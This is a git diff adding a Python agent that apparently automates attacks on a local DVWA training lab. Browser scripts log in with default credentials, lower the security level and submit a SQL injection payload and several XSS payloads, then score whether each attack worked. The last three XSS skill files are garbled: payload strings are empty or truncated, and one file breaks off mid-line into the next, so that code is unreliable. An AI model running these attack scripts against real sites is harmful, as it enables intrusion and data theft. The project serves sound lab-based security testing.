diff --git a/docker-compose.yml b/docker-compose.yml
new file mode 100644
index 0000000..c53af4d
--- /dev/null
+++ b/docker-compose.yml
@@ -0,0 +1,13 @@
+# Local lab target: DVWA, a deliberately vulnerable web application.
+# Keep it reachable from this machine only; never expose it to a network.
+services:
+  dvwa:
+    image: vulnerables/web-dvwa
+    container_name: dvwa
+    ports:
+      # Bind to loopback so the vulnerable app is not published on every
+      # host interface; http://localhost:8080 keeps working.
+      - "127.0.0.1:8080:80"
+    environment:
+      - MYSQL_PASS=password
+    restart: unless-stopped
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000..ea973c5
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,7 @@
+openai>=1.40.0
+playwright>=1.46.0
+httpx>=0.27.0
+pydantic>=2.8.0
+tenacity>=8.2.3
+rich>=13.7.1
+python-dotenv>=1.0.1
diff --git a/screens/sqli_low.png b/screens/sqli_low.png
new file mode 100644
index 0000000..e3eaeb0
Binary files /dev/null and b/screens/sqli_low.png differ
diff --git a/screens/xss_dom_low.png b/screens/xss_dom_low.png
new file mode 100644
index 0000000..7c178a9
Binary files /dev/null and b/screens/xss_dom_low.png differ
diff --git a/screens/xss_reflected_low.png b/screens/xss_reflected_low.png
new file mode 100644
index 0000000..7cdad95
Binary files /dev/null and b/screens/xss_reflected_low.png differ
diff --git a/screens/xss_stored_low.png b/screens/xss_stored_low.png
new file mode 100644
index 0000000..c2dcddb
Binary files /dev/null and b/screens/xss_stored_low.png differ
diff --git a/src/__init__.py b/src/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/__pycache__/__init__.cpython-313.pyc b/src/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..8f305df
Binary files /dev/null and b/src/__pycache__/__init__.cpython-313.pyc differ
diff --git a/src/__pycache__/config.cpython-313.pyc b/src/__pycache__/config.cpython-313.pyc
new file mode 100644
index 0000000..30c6732
Binary files /dev/null and b/src/__pycache__/config.cpython-313.pyc differ
diff --git a/src/__pycache__/openai_client.cpython-313.pyc b/src/__pycache__/openai_client.cpython-313.pyc
new file mode 100644
index 0000000..9e801f4
Binary files /dev/null and b/src/__pycache__/openai_client.cpython-313.pyc differ
diff --git a/src/__pycache__/run.cpython-313.pyc b/src/__pycache__/run.cpython-313.pyc
new file mode 100644
index 0000000..16f6abb
Binary files /dev/null and b/src/__pycache__/run.cpython-313.pyc differ
diff --git a/src/agent/__init__.py b/src/agent/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/agent/__pycache__/__init__.cpython-313.pyc b/src/agent/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..3f60f4a
Binary files /dev/null and b/src/agent/__pycache__/__init__.cpython-313.pyc differ
diff --git a/src/agent/__pycache__/orchestrator.cpython-313.pyc b/src/agent/__pycache__/orchestrator.cpython-313.pyc
new file mode 100644
index 0000000..7052308
Binary files /dev/null and b/src/agent/__pycache__/orchestrator.cpython-313.pyc differ
diff --git a/src/agent/__pycache__/planner.cpython-313.pyc b/src/agent/__pycache__/planner.cpython-313.pyc
new file mode 100644
index 0000000..602384a
Binary files /dev/null and b/src/agent/__pycache__/planner.cpython-313.pyc differ
diff --git a/src/agent/orchestrator.py b/src/agent/orchestrator.py
new file mode 100644
index 0000000..8e497c1
--- /dev/null
+++ b/src/agent/orchestrator.py
@@ -0,0 +1,37 @@
+"""Skill dispatcher for the DVWA agent.
+
+For the MVP, skills are hardcoded and selected by name. The planner (GPT-5)
+is imported for future planning loops; nothing in this module calls it yet.
+"""
+from typing import Dict, Any, Callable
+from . import planner
+from ..skills import login, xss_reflected_low, sqli_low, xss_stored_low, xss_dom_low
+
+
+def _runner(module) -> Callable[[str], Dict[str, Any]]:
+    """Return a callable that forwards only the base URL to ``module.run``."""
+    def call(base: str) -> Dict[str, Any]:
+        return module.run(base)
+    return call
+
+
+# Skill name -> callable that takes the target base URL and returns a result dict.
+SKILLS: Dict[str, Callable[[str], Dict[str, Any]]] = {
+    "login": _runner(login),
+    "xss_stored_low": _runner(xss_stored_low),
+    "xss_reflected_low": _runner(xss_reflected_low),
+    "xss_dom_low": _runner(xss_dom_low),
+    "sqli_low": _runner(sqli_low),
+}
+
+
+def run_skill(base_url: str, skill: str) -> Dict[str, Any]:
+    """Run the skill registered as ``skill`` against ``base_url``.
+
+    Raises:
+        KeyError: If ``skill`` is not a key of ``SKILLS``.
+    """
+    handler = SKILLS.get(skill)
+    if handler is None:
+        raise KeyError(f"Unknown skill: {skill}")
+    return handler(base_url)
diff --git a/src/agent/planner.py b/src/agent/planner.py
new file mode 100644
index 0000000..96b5f04
--- /dev/null
+++ b/src/agent/planner.py
@@ -0,0 +1,8 @@
+"""Planner entry point: delegates the decision to the OpenAI client."""
+from ..openai_client import plan_next_action
+
+
+def decide(context: dict) -> dict:
+    """Return whatever ``plan_next_action`` proposes for ``context``."""
+    next_action = plan_next_action(context)
+    return next_action
diff --git a/src/agent/score.py b/src/agent/score.py
new file mode 100644
index 0000000..28cbae9
--- /dev/null
+++ b/src/agent/score.py
@@ -0,0 +1,42 @@
+"""Run the skill suite against a target and print a pass/fail score."""
+import argparse
+import json
+
+# score.py lives in the same package as orchestrator.py (src/agent/), so the
+# import is a sibling import; ".agent.orchestrator" would resolve to the
+# non-existent src.agent.agent.orchestrator.
+from .orchestrator import run_skill
+
+# (skill name, keyword arguments) pairs. The keyword arguments are placeholders:
+# run_skill only accepts the target and the skill name.
+SUITE = [
+    ("xss_reflected_low", {}),
+    ("xss_stored_low", {}),
+    ("sqli_low", {}),
+    # later: ("command_injection_low", {}), ("csrf_low", {}), ("upload_low", {})
+]
+
+
+def main():
+    """Run every skill in ``SUITE`` against ``--target`` and report the score.
+
+    Prints one OK/FAIL line per skill, the total score, and finally the
+    per-skill result dicts as JSON.
+    """
+    ap = argparse.ArgumentParser()
+    ap.add_argument('--target', required=True)
+    args = ap.parse_args()
+    results = {}
+    ok_count = 0
+    for skill, _kwargs in SUITE:
+        res = run_skill(args.target, skill)
+        results[skill] = res
+        passed = bool(res.get("ok"))
+        ok_count += int(passed)
+        print(f"[{skill}] -> {'OK' if passed else 'FAIL'}")
+    print(f"\nScore: {ok_count}/{len(SUITE)}")
+    print(json.dumps(results, indent=2, ensure_ascii=False))
+
+
+if __name__ == "__main__":
+    main()
diff --git a/src/config.py b/src/config.py
new file mode 100644
index 0000000..83c7c8c
--- /dev/null
+++ b/src/config.py
@@ -0,0 +1,30 @@
+"""Agent settings, read from environment variables when this module is imported."""
+from pydantic import BaseModel
+import os
+
+
+def _split_hosts(raw: str) -> list[str]:
+    """Split a comma-separated host list, trimming whitespace and dropping blanks.
+
+    Blank entries (from an empty value, ``a,,b`` or a trailing comma) are
+    removed so the allowlist never contains an empty host name.
+    """
+    return [host for host in (part.strip() for part in raw.split(",")) if host]
+
+
+class Settings(BaseModel):
+    """Environment-derived configuration; defaults are evaluated once, at class definition."""
+
+    # API key for the OpenAI client; empty string when OPENAI_API_KEY is unset.
+    openai_api_key: str = os.getenv("OPENAI_API_KEY", "")
+    # Model name passed to the OpenAI client.
+    openai_model: str = os.getenv("OPENAI_MODEL", "gpt-5")
+    # Hosts listed in ALLOWLIST_HOSTS (comma-separated).
+    allowlist_hosts: list[str] = _split_hosts(os.getenv("ALLOWLIST_HOSTS", "localhost,127.0.0.1,dvwa"))
+    # Target URL from DVWA_URL; empty string when unset.
+    dvwa_url_env: str = os.getenv("DVWA_URL", "").strip()
+    # True only when HEADLESS is "true" (case-insensitive); any other value is False.
+    headless: bool = os.getenv("HEADLESS", "true").lower() == "true"
+
+
+settings = Settings()
diff --git a/src/detectors/__init__.py b/src/detectors/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/detectors/__pycache__/__init__.cpython-313.pyc b/src/detectors/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..b30f559
Binary files /dev/null and b/src/detectors/__pycache__/__init__.cpython-313.pyc differ
diff --git a/src/detectors/__pycache__/sql_errors.cpython-313.pyc b/src/detectors/__pycache__/sql_errors.cpython-313.pyc
new file mode 100644
index 0000000..ff05aa8
Binary files /dev/null and b/src/detectors/__pycache__/sql_errors.cpython-313.pyc differ
diff --git a/src/detectors/sql_errors.py b/src/detectors/sql_errors.py
new file mode 100644
index 0000000..c819b62
--- /dev/null
+++ b/src/detectors/sql_errors.py
@@ -0,0 +1,20 @@
+"""Heuristic detection of database error messages in response text."""
+import re
+
+# Case-insensitive patterns; any single match counts as a SQL error.
+SQL_ERRORS = [
+    r"SQL syntax.*MySQL",
+    r"Warning: mysql_",
+    r"Unclosed quotation mark",
+    r"SQLSTATE\[HY000\]",
+    r"You have an error in your SQL syntax",
+]
+compiled = [re.compile(pattern, flags=re.IGNORECASE) for pattern in SQL_ERRORS]
+
+
+def has_sql_error(text: str) -> bool:
+    """Return True if ``text`` matches at least one pattern in ``SQL_ERRORS``."""
+    for matcher in compiled:
+        if matcher.search(text) is not None:
+            return True
+    return False
diff --git a/src/openai_client.py b/src/openai_client.py
new file mode 100644
index 0000000..14539bb
--- /dev/null
+++ b/src/openai_client.py
@@ -0,0 +1,59 @@
+"""OpenAI client wrapper that asks the model for the agent's next action."""
+import json
+from typing import Any, Dict
+from openai import OpenAI
+from .config import settings
+
+client = OpenAI(api_key=settings.openai_api_key)
+
+# Returned (as a copy) whenever the model output cannot be read as a JSON object.
+_FALLBACK_ACTION: Dict[str, Any] = {"tool":"noop","target":"","data":None,"rationale":"fallback"}
+
+
+def plan_next_action(context: Dict[str, Any]) -> Dict[str, Any]:
+    """Ask the configured model (GPT-5 by default) for one next action as JSON.
+
+    Args:
+        context: State to plan from; its ``str()`` form is embedded in the prompt.
+
+    Returns:
+        The JSON object produced by the model, or a ``noop`` action when the
+        output is missing, is not valid JSON, or is not a JSON object.
+    """
+    system = (
+        "You are a safe web security agent. "
+        "Only operate on the allowlisted lab host and return STRICT JSON with the next action."
+    )
+    user = (
+        "Given this context, propose one next action as a JSON object with keys: "
+        "{'tool': 'navigate|fill_form|click|type_and_submit|wait|noop', "
+        "'target': 'url or selector', 'data': 'payload or null', 'rationale': 'short'}."
+        "\nContext:\n" + str(context)
+    )
+    # NOTE(review): client.responses needs an SDK release that ships the
+    # Responses API, and some models may reject temperature/top_p; confirm both
+    # against the pinned openai version and the configured model.
+    resp = client.responses.create(
+        model=settings.openai_model,
+        input=[
+            {"role":"system","content":system},
+            {"role":"user","content":user},
+        ],
+        temperature=0.2,
+        top_p=0.9,
+        max_output_tokens=400,
+        # The Responses API selects JSON mode through text.format;
+        # response_format is the Chat Completions parameter and is not accepted here.
+        text={"format": {"type": "json_object"}},
+    )
+    # Prefer an already-parsed payload when the SDK provides one, else the raw text.
+    payload = getattr(resp, "output_parsed", None) or getattr(resp, "output_text", None)
+    if isinstance(payload, str):
+        try:
+            payload = json.loads(payload)
+        except json.JSONDecodeError:
+            payload = None
+    # Valid JSON that is not an object (list, string, number) is not a usable action.
+    if isinstance(payload, dict):
+        return payload
+    return dict(_FALLBACK_ACTION)
diff --git a/src/run.py b/src/run.py
new file mode 100644
index 0000000..168a17e
--- /dev/null
+++ b/src/run.py
@@ -0,0 +1,22 @@
+"""Command-line entry point: run a single skill and print its result as JSON."""
+import argparse, json, os
+from .config import settings
+from .agent.orchestrator import run_skill
+
+
+def main():
+    """Parse ``--target`` and ``--skill``, run the skill, and print the result dict."""
+    default_target = settings.dvwa_url_env or "http://localhost:8080"
+    skill_names = ['login','xss_reflected_low','sqli_low', 'xss_stored_low', 'xss_dom_low']
+
+    parser = argparse.ArgumentParser()
+    parser.add_argument('--target', required=False, default=default_target)
+    parser.add_argument('--skill', required=True, choices=skill_names)
+    options = parser.parse_args()
+
+    outcome = run_skill(options.target, options.skill)
+    print(json.dumps(outcome, indent=2, ensure_ascii=False))
+
+
+if __name__ == '__main__':
+    main()
diff --git a/src/skills/__init__.py b/src/skills/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/skills/__pycache__/__init__.cpython-313.pyc b/src/skills/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..6c9599f
Binary files /dev/null and b/src/skills/__pycache__/__init__.cpython-313.pyc differ
diff --git a/src/skills/__pycache__/login.cpython-313.pyc b/src/skills/__pycache__/login.cpython-313.pyc
new file mode 100644
index 0000000..3a37167
Binary files /dev/null and b/src/skills/__pycache__/login.cpython-313.pyc differ
diff --git a/src/skills/__pycache__/sqli_low.cpython-313.pyc b/src/skills/__pycache__/sqli_low.cpython-313.pyc
new file mode 100644
index 0000000..db6d9a1
Binary files /dev/null and b/src/skills/__pycache__/sqli_low.cpython-313.pyc differ
diff --git a/src/skills/__pycache__/xss_dom_low.cpython-313.pyc b/src/skills/__pycache__/xss_dom_low.cpython-313.pyc
new file mode 100644
index 0000000..889ac17
Binary files /dev/null and b/src/skills/__pycache__/xss_dom_low.cpython-313.pyc differ
diff --git a/src/skills/__pycache__/xss_reflected_low.cpython-313.pyc b/src/skills/__pycache__/xss_reflected_low.cpython-313.pyc
new file mode 100644
index 0000000..01a7469
Binary files /dev/null and b/src/skills/__pycache__/xss_reflected_low.cpython-313.pyc differ
diff --git a/src/skills/__pycache__/xss_stored_low.cpython-313.pyc b/src/skills/__pycache__/xss_stored_low.cpython-313.pyc
new file mode 100644
index 0000000..dca2de5
Binary files /dev/null and b/src/skills/__pycache__/xss_stored_low.cpython-313.pyc differ
diff --git a/src/skills/login.py b/src/skills/login.py
new file mode 100644
index 0000000..246dcdb
--- /dev/null
+++ b/src/skills/login.py
@@ -0,0 +1,29 @@
+"""Skill: log in to DVWA."""
+from ..tools.browser import Browser
+
+
+def run(base_url: str, username: str="admin", password: str="password") -> dict:
+    """Log in to DVWA (default credentials unless overridden).
+
+    Args:
+        base_url: Base URL of the DVWA instance.
+        username: Login name to submit.
+        password: Password to submit.
+
+    Returns:
+        A dict with ``ok`` (whether the page after submitting looks logged in),
+        ``page`` and ``evidence`` (a fixed note on success, otherwise the first
+        500 characters of the page text).
+    """
+    with Browser(base_url) as b:
+        b.goto("/login.php")
+        # Same waits as the other skills: make sure the form exists before
+        # filling it, and let the post-login page load before reading it.
+        b.page.wait_for_selector('input[name="username"]', timeout=15000)
+        b.fill('input[name="username"]', username)
+        b.fill('input[name="password"]', password)
+        b.click('input[type="submit"]')
+        b.page.wait_for_load_state("domcontentloaded")
+        body = b.text()
+        ok = "DVWA Security" in body or "Welcome" in body or "logout" in body.lower()
+        return {"ok": ok, "page": "home", "evidence": "contains DVWA after login" if ok else body[:500]}
diff --git a/src/skills/sqli_low.py b/src/skills/sqli_low.py
new file mode 100644
index 0000000..91862a5
--- /dev/null
+++ b/src/skills/sqli_low.py
@@ -0,0 +1,71 @@
+# agent/src/skills/sqli_low.py
+"""Skill: SQL injection against the DVWA SQLi page (security level low)."""
+
+from ..tools.browser import Browser
+from pathlib import Path
+
+
+def run(base_url: str, payload: str = "1' OR '1'='1' -- ") -> dict:
+    """Submit ``payload`` to the SQLi form and report whether it dumped rows.
+
+    Args:
+        base_url: Base URL of the DVWA instance.
+        payload: Value typed into the ``id`` field.
+
+    Returns:
+        A dict with ``ok``, ``vector``, ``payload``, ``reason``,
+        ``evidence_excerpt`` (first 1200 characters of the page HTML) and
+        ``screenshot`` (path of the saved PNG).
+    """
+    with Browser(base_url) as b:
+        # log in with the default credentials
+        b.goto("/login.php")
+        b.page.wait_for_selector('input[name="username"]', timeout=15000)
+        b.fill('input[name="username"]', "admin")
+        b.fill('input[name="password"]', "password")
+        b.click('input[type="submit"]')
+        b.page.wait_for_load_state("domcontentloaded")
+
+        # security = low; best effort, so a failure here is deliberately ignored
+        try:
+            b.goto("/security.php")
+            b.page.wait_for_selector('select[name="security"]', timeout=5000)
+            b.page.select_option('select[name="security"]', 'low')
+            b.click('input[type="submit"]')
+            b.page.wait_for_load_state("domcontentloaded")
+        except Exception:
+            pass
+
+        # go to the SQLi page
+        b.goto("/vulnerabilities/sqli/")
+        b.page.wait_for_selector('input[name="id"]', timeout=15000)
+
+        # submit the payload
+        b.fill('input[name="id"]', payload)
+        b.click('input[type="submit"]')
+        b.page.wait_for_timeout(1200)
+
+        # save a screenshot in a "screens" directory one level above parents[2]
+        agent_dir = Path(__file__).resolve().parents[2]
+        screens_dir = agent_dir.parent / "screens"
+        screens_dir.mkdir(parents=True, exist_ok=True)
+        screenshot_path = screens_dir / "sqli_low.png"
+        b.page.screenshot(path=str(screenshot_path), full_page=True)
+
+        # Evaluate success. Labels such as "User ID" and "Username" can be part
+        # of the page chrome whether or not the injection worked, so they prove
+        # nothing; count result rows instead. A dumped table yields more than
+        # one "First name:" / "Surname:" pair.
+        # NOTE(review): assumes DVWA's low-level result markup; confirm.
+        html = b.content()
+        row_count = min(html.count("First name:"), html.count("Surname:"))
+        found = row_count > 1
+
+        return {
+            "ok": found,
+            "vector": "SQLi (Low)",
+            "payload": payload,
+            "reason": "User table markers present" if found else "payload did not dump table",
+            "evidence_excerpt": html[:1200],
+            "screenshot": str(screenshot_path)
+        }
diff --git a/src/skills/xss_dom_low.py b/src/skills/xss_dom_low.py
new file mode 100644
index 0000000..b3a016c
--- /dev/null
+++ b/src/skills/xss_dom_low.py
@@ -0,0 +1,93 @@
+# agent/src/skills/xss_dom_low.py
+from pathlib import Path
+from urllib.parse import urlencode
+from ..tools.browser import Browser
+
+# payloads comuns que funcionam no DVWA DOM XSS (param "default")
+CANDIDATES = [
+ '',
+ '">',
+ '
',
+]
+
+def run(base_url: str) -> dict:
+ with Browser(base_url) as b:
+ # 1) login
+ b.goto("/login.php")
+ b.page.wait_for_selector('input[name="username"]', timeout=15000)
+ b.fill('input[name="username"]', "admin")
+ b.fill('input[name="password"]', "password")
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+
+ # 2) tentar setar Security=Low (best-effort)
+ try:
+ b.goto("/security.php")
+ b.page.wait_for_selector('select[name="security"]', timeout=5000)
+ b.page.select_option('select[name="security"]', 'low')
+ if b.page.locator('input[name="seclev_submit"]').count() > 0:
+ b.click('input[name="seclev_submit"]')
+ else:
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+ except Exception:
+ pass
+
+ # 3) hook para capturar alert()
+ alert = {"ok": False, "message": ""}
+ def on_dialog(d):
+ alert["ok"] = True
+ alert["message"] = d.message
+ d.accept()
+ b.page.on("dialog", on_dialog)
+
+ # 4) baseline: página “limpa”
+ b.goto("/vulnerabilities/xss_d/?default=English")
+ b.page.wait_for_selector("#main_menu", timeout=10000) # qualquer âncora estável
+ base_html = b.content()
+
+ # 5) tentar payloads via GET (?default=...)
+ for p in CANDIDATES:
+ qs = urlencode({"default": p})
+ b.goto(f"/vulnerabilities/xss_d/?{qs}")
+ b.page.wait_for_timeout(1200) # dá tempo do JS DOM executar
+
+ html = b.content()
+ raw_present = ("') -> dict:
+ with Browser(base_url) as b:
+ # login
+ b.goto("/login.php")
+ b.page.wait_for_selector('input[name="username"]', timeout=15000)
+ b.fill('input[name="username"]', "admin")
+ b.fill('input[name="password"]', "password")
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+
+ # security = low (tentativa best-effort)
+ try:
+ b.goto("/security.php")
+ b.page.wait_for_selector('select[name="security"]', timeout=5000)
+ b.page.select_option('select[name="security"]', 'low')
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+ except Exception:
+ pass
+
+ # ir para XSS Reflected
+ b.goto("/vulnerabilities/xss_r/")
+ b.page.wait_for_selector('input[name="name"]', timeout=15000)
+
+ # hook p/ capturar alert()
+ alert_triggered = {"ok": False, "message": ""}
+ def on_dialog(d):
+ alert_triggered["ok"] = True
+ alert_triggered["message"] = d.message
+ d.accept()
+ b.page.on("dialog", on_dialog)
+
+ # enviar payload
+ b.fill('input[name="name"]', payload)
+ b.click('input[type="submit"]')
+ b.page.wait_for_timeout(1200)
+
+ # salvar screenshot
+ agent_dir = Path(__file__).resolve().parents[2]
+ screens_dir = agent_dir.parent / "screens"
+ screens_dir.mkdir(parents=True, exist_ok=True)
+ screenshot_path = screens_dir / "xss_reflected_low.png"
+ b.page.screenshot(path=str(screenshot_path), full_page=True)
+
+ # analisar sucesso
+ html = b.content()
+ raw_present = "') -> dict:
+ with Browser(base_url) as b:
+ # 1) login
+ b.goto("/login.php")
+ b.page.wait_for_selector('input[name="username"]', timeout=15000)
+ b.fill('input[name="username"]', "admin")
+ b.fill('input[name="password"]', "password")
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+
+ # 2) best-effort: Security = Low (se a tela existir)
+ try:
+ b.goto("/security.php")
+ b.page.wait_for_selector('select[name="security"]', timeout=5000)
+ b.page.select_option('select[name="security"]', 'low')
+ if b.page.locator('input[name="seclev_submit"]').count() > 0:
+ b.click('input[name="seclev_submit"]')
+ else:
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+ except Exception:
+ pass
+
+ # 3) ir para XSS Stored
+ b.goto("/vulnerabilities/xss_s/")
+ b.page.wait_for_selector('input[name="txtName"]', timeout=15000)
+
+ # 4) preencher
+ b.fill('input[name="txtName"]', "pwn")
+ b.fill('textarea[name="mtxMessage"]', payload)
+
+ # 5) hook para capturar o alert()
+ alert_triggered = {"ok": False, "message": ""}
+ def on_dialog(d):
+ alert_triggered["ok"] = True
+ alert_triggered["message"] = d.message
+ d.accept()
+ b.page.on("dialog", on_dialog)
+
+ # 6) enviar
+ if b.page.locator('input[name="btnSign"]').count() > 0:
+ b.click('input[name="btnSign"]')
+ else:
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+
+ # 7) aguardar potencial execução do alert
+ b.page.wait_for_timeout(1200)
+
+ # 8) salvar screenshot (pasta screens/ ao lado do projeto)
+ # base_dir = .../agent -> queremos .../screens
+ agent_dir = Path(__file__).resolve().parents[2] # .../agent
+ screens_dir = agent_dir.parent / "screens"
+ screens_dir.mkdir(parents=True, exist_ok=True)
+ screenshot_path = screens_dir / "xss_stored_low.png"
+ b.page.screenshot(path=str(screenshot_path), full_page=True)
+
+ # 9) avaliar sucesso: alert() capturado OU payload cru na página
+ html = b.content()
+ raw_present = "